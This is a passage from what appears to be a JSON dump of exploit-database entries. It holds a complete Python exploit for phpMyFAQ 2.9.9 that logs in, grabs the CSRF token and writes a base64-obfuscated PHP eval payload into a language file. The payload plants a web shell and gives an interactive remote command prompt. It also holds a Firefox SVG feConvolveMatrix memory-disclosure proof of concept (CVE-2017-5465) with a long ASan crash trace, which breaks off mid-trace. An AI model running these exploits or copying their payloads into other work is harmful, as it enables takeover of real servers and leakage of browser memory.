PMF_ROOT_DIR.'/lang/language_'.$lang.'.bak.php')) {\r\n 119 echo 0;\r\n 120 exit;\r\n 121 }\r\n 122 \r\n 123 $newFileContents = '';\r\n 124 $tmpLines = [];\r\n 125 \r\n 126 // Read in the head of the file we're writing to\r\n 127 $fh = fopen($filename, 'r');\r\n 128 do {\r\n 129 $line = fgets($fh);\r\n 130 array_push($tmpLines, rtrim($line));\r\n 131 } while ('*/' != substr(trim($line), -2));\r\n 132 fclose($fh);\r\n 133 \r\n 134 // Construct lines with variable definitions\r\n 135 foreach ($_SESSION['trans']['rightVarsOnly'] as $key => $val) {\r\n 136 if (0 === strpos($key, 'PMF_LANG')) {\r\n 137 $val = \"'$val'\";\r\n 138 }\r\n 139 array_push($tmpLines, '$'.str_replace(array('[', ']'), array(\"['\", \"']\"), $key).\" = $val;\");\r\n 140 }\r\n 141 \r\n 142 $newFileContents .= implode(\"\\n\", $tmpLines);\r\n 143 \r\n 144 unset($_SESSION['trans']);\r\n 145 \r\n 146 $retval = file_put_contents($filename, $newFileContents);\r\n 147 echo intval($retval);\r\n 148 break;\r\n\r\n\r\n\r\n\r\nthe exploit\r\n-----------------------------------------------------------------\r\n\r\n\r\n#! /usr/bin/python\r\nimport sys, requests, argparse, readline\r\n \r\ndef main(argv):\r\n global url, user, password\r\n parser = argparse.ArgumentParser(description='PHPMYFAQ 2.9.9 Code Injection exploitation tool. 
author : tomplixsee')\r\n parser.add_argument('-u','--url', help='target url',required=True)\r\n parser.add_argument('-p','--password', help='password',required=True)\r\n parser.add_argument('-s','--user', help='user',required=True)\r\n args = parser.parse_args()\r\n \r\n url = args.url\r\n user = args.user\r\n password = args.password\r\n\r\nif __name__ == \"__main__\":\r\n main(sys.argv[1:])\r\n\r\n#get the cookie\r\ndef login():\r\n global url, user, password,cookie\r\n print \"\\033[1;33m>>>>>> logging in\\033[1;m\"\r\n data = {\"faqusername\":user,\"faqpassword\":password}\r\n headers = {\r\n }\r\n r = requests.post(url+\"/admin/index.php\", headers=headers, data=data)\r\n if \"dashboard\" in r.text:\r\n print \"\\033[1;32m>>>>>> login sucessful\\033[1;m\"\r\n cookie = r.cookies[\"PHPSESSID\"]\r\n check()\r\n else:\r\n print \"login failed\"\r\n sys.exit()\r\n\r\n#check if user has access to edit translations. \r\n#get the crsf token \r\ndef check():\r\n global url,cookie, csrf\r\n print \"\\033[1;33m>>>>>> check user auth\\033[1;m\"\r\n headers = {\r\n 'Accept': '*/*',\r\n \"Cookie\":\"PHPSESSID=\"+cookie\r\n }\r\n r = requests.get(url+\"/admin/index.php?action=transedit&translang=id\", headers=headers)\r\n if (\"You are not authorized.\" not in r.text) or (\"ajaxaction=save_translated_lang&csrf\" in r.text):\r\n print \"\\033[1;32m>>>>>> authorized\\033[1;m\"\r\n else:\r\n print \"not authorized\"\r\n sys.exit()\r\n #get csrf token\r\n str_csrf = r.text.split(\"action=ajax&ajax=trans&ajaxaction=save_translated_lang&csrf=\" )\r\n csrf = str_csrf[1][0:40]\r\n savebuffer()\r\n\r\n#save payload to session\r\ndef savebuffer():\r\n global url,cookie, csrf\r\n print \"\\033[1;33m>>>>>> trying to fill the buffer\\033[1;m\"\r\n headers = {\r\n 'Accept': '*/*',\r\n \"Cookie\":\"PHPSESSID=\"+cookie\r\n }\r\n data = {\r\n \"LANG_CONF[main.metaDescription]\":'eval(base64_decode(\\\"c3lzdGVtKCRfUkVRVUVTVFtxXSk7IGlmKGlzc2V0KCRfUkVRVUVTVFttYXRpXSkpZGllOw==\\\"))'\r\n }\r\n 
r = requests.post(url+\"/admin/index.php?action=ajax&ajax=trans&ajaxaction=save_page_buffer&csrf=\"+csrf, headers=headers, data=data)\r\n if r.text==\"1\":\r\n print \"\\033[1;32m>>>>>> success\\033[1;m\"\r\n write2file()\r\n else:\r\n sys.exit()\r\n \r\n#write payload to file\r\ndef write2file():\r\n global url,cookie, csrf\r\n print \"\\033[1;33m>>>>>> write payload to server\\033[1;m\"\r\n headers = {\r\n 'Accept': '*/*',\r\n \"Cookie\":\"PHPSESSID=\"+cookie\r\n }\r\n data = {}\r\n r = requests.post(url+\"/admin/index.php?action=ajax&ajax=trans&ajaxaction=save_translated_lang&csrf=\"+csrf, headers=headers, data=data)\r\n if r.text!=\"\":\r\n print \"\\033[1;32m>>>>>> success\\033[1;m\"\r\n print \"\\033[1;32m>>>>>> enjoy your shell\\033[1;m\"\r\n exploit('')\r\n else:\r\n sys.exit()\r\n\r\n#send system command\r\ndef exploit(command):\r\n global url,cookie\r\n command = raw_input('\\033[1;31mshell > \\033[1;m') \r\n if command == \"exit\":\r\n print \"goodbye\"\r\n sys.exit()\r\n \r\n headers = {\r\n 'Accept': '*/*',\r\n \"Cookie\":\"PHPSESSID=\"+cookie\r\n }\r\n data = {\"q\":command,\r\n \"mati\":\"mati\",\r\n \"language\":\"id\"\r\n }\r\n r = requests.post(url+\"/admin/index.php\", headers=headers, data=data)\r\n print r.text\r\n exploit('')\r\n \r\nlogin()\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29018"}, {"lastseen": "2018-04-03T01:34:09", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2017-05-25T00:00:00", "title": "Mozilla Firefox < 53 - ConvolvePixel Memory Disclosure Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-03T01:34:09", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5465"], "modified": "2017-05-25T00:00:00", "id": "1337DAY-ID-27839", "href": 
"https://0day.today/exploit/description/27839", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1185\r\n \r\nMozilla bug tracker link: https://bugzilla.mozilla.org/show_bug.cgi?id=1347617\r\n \r\nThere is an out of bound read leading to memory disclosure in Firefox. The vulnerability was confirmed on the nightly ASan build. \r\n \r\nPoC:\r\n \r\n=================================================================\r\n-->\r\n \r\n<svg filter=\"url(#f)\">\r\n<filter id=\"f\" filterRes=\"19\" filterUnits=\"userSpaceOnUse\">\r\n<feConvolveMatrix kernelMatrix=\"1 1 1 1 1 1 1 1 1\" kernelUnitLength=\"1 -1\" />\r\n \r\n<!--\r\n=================================================================\r\n \r\nPreliminary analysis:\r\n \r\nThe problem seems to be the negative krenel unit length. This leads to an out of bound access in ConvolvePixel() and out-of-bounds data is going to be copied into the SVG image. From there, it can be extracted by an attacker by loading the SVG image into a canvas element.\r\n \r\nASan log:\r\n \r\n=================================================================\r\n==25524==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f8cd2946336 at pc 0x7f8d3fcd397e bp 0x7ffc051ca390 sp 0x7ffc051ca388\r\nREAD of size 1 at 0x7f8cd2946336 thread T0\r\n #0 0x7f8d3fcd397d in ColorComponentAtPoint /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2293:10\r\n #1 0x7f8d3fcd397d in ConvolvePixel<int> /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2358\r\n #2 0x7f8d3fcd397d in already_AddRefed<mozilla::gfx::DataSourceSurface> mozilla::gfx::FilterNodeConvolveMatrixSoftware::DoRender<int>(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, int, int) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2509\r\n #3 0x7f8d3fcd089a in mozilla::gfx::FilterNodeConvolveMatrixSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) 
/home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2379:12\r\n #4 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #5 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #6 0x7f8d3fce4035 in mozilla::gfx::FilterNodeCropSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3140:10\r\n #7 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #8 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #9 0x7f8d3fce4895 in mozilla::gfx::FilterNodeUnpremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3197:5\r\n #10 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #11 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, 
mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #12 0x7f8d3fcc7832 in mozilla::gfx::FilterNodeComponentTransferSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:1781:5\r\n #13 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #14 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #15 0x7f8d3fce4685 in mozilla::gfx::FilterNodePremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3168:5\r\n #16 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #17 0x7f8d3fc7cb43 in mozilla::gfx::FilterNodeSoftware::Draw(mozilla::gfx::DrawTarget*, mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:580:14\r\n #18 0x7f8d3fd8bc6e in mozilla::gfx::FilterSupport::RenderFilterDescription(mozilla::gfx::DrawTarget*, mozilla::gfx::FilterDescription const&, 
mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, nsTArray<RefPtr<mozilla::gfx::SourceSurface> >&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/src/FilterSupport.cpp:1360:8\r\n #19 0x7f8d44ccc3fd in nsFilterInstance::Render(mozilla::gfx::DrawTarget*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:545:3\r\n #20 0x7f8d44ccb7ee in nsFilterInstance::PaintFilteredFrame(nsIFrame*, mozilla::gfx::DrawTarget*, gfxMatrix const&, nsSVGFilterPaintCallback*, nsRegion const*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:81:19\r\n #21 0x7f8d44d09f72 in nsSVGIntegrationUtils::PaintFilter(nsSVGIntegrationUtils::PaintFramesParams const&) /home/worker/workspace/build/src/layout/svg/nsSVGIntegrationUtils.cpp:1094:5\r\n #22 0x7f8d44f7e9bd in PaintAsLayer /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:8330:30\r\n #23 0x7f8d44f7e9bd in PaintInactiveLayer /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:3722\r\n #24 0x7f8d44f7e9bd in mozilla::FrameLayerBuilder::PaintItems(nsTArray<mozilla::FrameLayerBuilder::ClippedDisplayItem>&, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, mozilla::gfx::IntPointTyped<mozilla::gfx::UnknownUnits> const&, float, float, int) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6044\r\n #25 0x7f8d44f819f2 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, 
mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6233:19\r\n #26 0x7f8d40034966 in mozilla::layers::ClientPaintedLayer::PaintThebes(nsTArray<mozilla::layers::ReadbackProcessor::Update>*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:85:5\r\n #27 0x7f8d40035611 in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:139:3\r\n #28 0x7f8d4006810f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29\r\n #29 0x7f8d4006810f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29\r\n #30 0x7f8d4002fcb7 in mozilla::layers::ClientLayerManager::EndTransactionInternal(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:358:13\r\n #31 0x7f8d40030527 in mozilla::layers::ClientLayerManager::EndTransaction(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) 
/home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:411:3\r\n #32 0x7f8d44ff4b51 in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:2253:17\r\n #33 0x7f8d447e7554 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /home/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3714:12\r\n #34 0x7f8d446eaf2a in mozilla::PresShell::Paint(nsView*, nsRegion const&, unsigned int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:6489:5\r\n #35 0x7f8d43f4cff4 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) /home/worker/workspace/build/src/view/nsViewManager.cpp:483:19\r\n #36 0x7f8d43f4c54f in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:415:33\r\n #37 0x7f8d43f4faed in nsViewManager::ProcessPendingUpdates() /home/worker/workspace/build/src/view/nsViewManager.cpp:1104:5\r\n #38 0x7f8d44648596 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2031:11\r\n #39 0x7f8d44654553 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:299:7\r\n #40 0x7f8d44654224 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:321:5\r\n #41 0x7f8d446569c5 in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:711:5\r\n #42 0x7f8d446569c5 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:624\r\n #43 0x7f8d44656bfe in 
applyImpl<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), StoreCopyPassByConstLRef<mozilla::TimeStamp> , 0> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12\r\n #44 0x7f8d44656bfe in apply<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp)> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861\r\n #45 0x7f8d44656bfe in mozilla::detail::RunnableMethodImpl<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver*, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), true, false, mozilla::TimeStamp>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890\r\n #46 0x7f8d3e06238c in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14\r\n #47 0x7f8d3e05ecb8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10\r\n #48 0x7f8d3ee06e21 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21\r\n #49 0x7f8d3ed67980 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10\r\n #50 0x7f8d3ed67980 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231\r\n #51 0x7f8d3ed67980 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211\r\n #52 0x7f8d43fc682f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27\r\n #53 0x7f8d474273c1 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:30\r\n #54 0x7f8d475e78ca in XREMain::XRE_mainRun() 
/home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4492:22\r\n #55 0x7f8d475e9353 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4670:8\r\n #56 0x7f8d475ea6dc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4761:21\r\n #57 0x4eb2b3 in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:236:22\r\n #58 0x4eb2b3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:307\r\n #59 0x7f8d5914d82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291\r\n #60 0x41ce08 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41ce08)\r\n \r\n0x7f8cd2946336 is located 1226 bytes to the left of 162639-byte region [0x7f8cd2946800,0x7f8cd296e34f)\r\nallocated by thread T0 here:\r\n #0 0x4bb873 in calloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:72:3\r\n #1 0x7f8d3fd5a936 in Realloc /home/worker/workspace/build/src/gfx/2d/Tools.h:179:41\r\n #2 0x7f8d3fd5a936 in mozilla::gfx::SourceSurfaceAlignedRawData::Init(mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SurfaceFormat, bool, unsigned char, int) /home/worker/workspace/build/src/gfx/2d/SourceSurfaceRawData.cpp:66\r\n #3 0x7f8d3fc40c98 in mozilla::gfx::Factory::CreateDataSourceSurface(mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SurfaceFormat, bool) /home/worker/workspace/build/src/gfx/2d/Factory.cpp:878:16\r\n #4 0x7f8d3fcb1bd7 in mozilla::gfx::GetDataSurfaceInRect(mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::ConvolveMatrixEdgeMode) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:434:5\r\n #5 0x7f8d3fcb8903 in 
mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:753:15\r\n #6 0x7f8d3fcd0d8d in already_AddRefed<mozilla::gfx::DataSourceSurface> mozilla::gfx::FilterNodeConvolveMatrixSoftware::DoRender<int>(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, int, int) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2460:5\r\n #7 0x7f8d3fcd089a in mozilla::gfx::FilterNodeConvolveMatrixSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2379:12\r\n #8 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #9 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #10 0x7f8d3fce4035 in mozilla::gfx::FilterNodeCropSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3140:10\r\n #11 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #12 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, 
mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #13 0x7f8d3fce4895 in mozilla::gfx::FilterNodeUnpremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3197:5\r\n #14 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #15 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #16 0x7f8d3fcc7832 in mozilla::gfx::FilterNodeComponentTransferSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:1781:5\r\n #17 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #18 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #19 0x7f8d3fce4685 in mozilla::gfx::FilterNodePremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) 
/home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3168:5\r\n #20 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #21 0x7f8d3fc7cb43 in mozilla::gfx::FilterNodeSoftware::Draw(mozilla::gfx::DrawTarget*, mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:580:14\r\n #22 0x7f8d3fd8bc6e in mozilla::gfx::FilterSupport::RenderFilterDescription(mozilla::gfx::DrawTarget*, mozilla::gfx::FilterDescription const&, mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, nsTArray<RefPtr<mozilla::gfx::SourceSurface> >&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/src/FilterSupport.cpp:1360:8\r\n #23 0x7f8d44ccc3fd in nsFilterInstance::Render(mozilla::gfx::DrawTarget*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:545:3\r\n #24 0x7f8d44ccb7ee in nsFilterInstance::PaintFilteredFrame(nsIFrame*, mozilla::gfx::DrawTarget*, gfxMatrix const&, nsSVGFilterPaintCallback*, nsRegion const*) 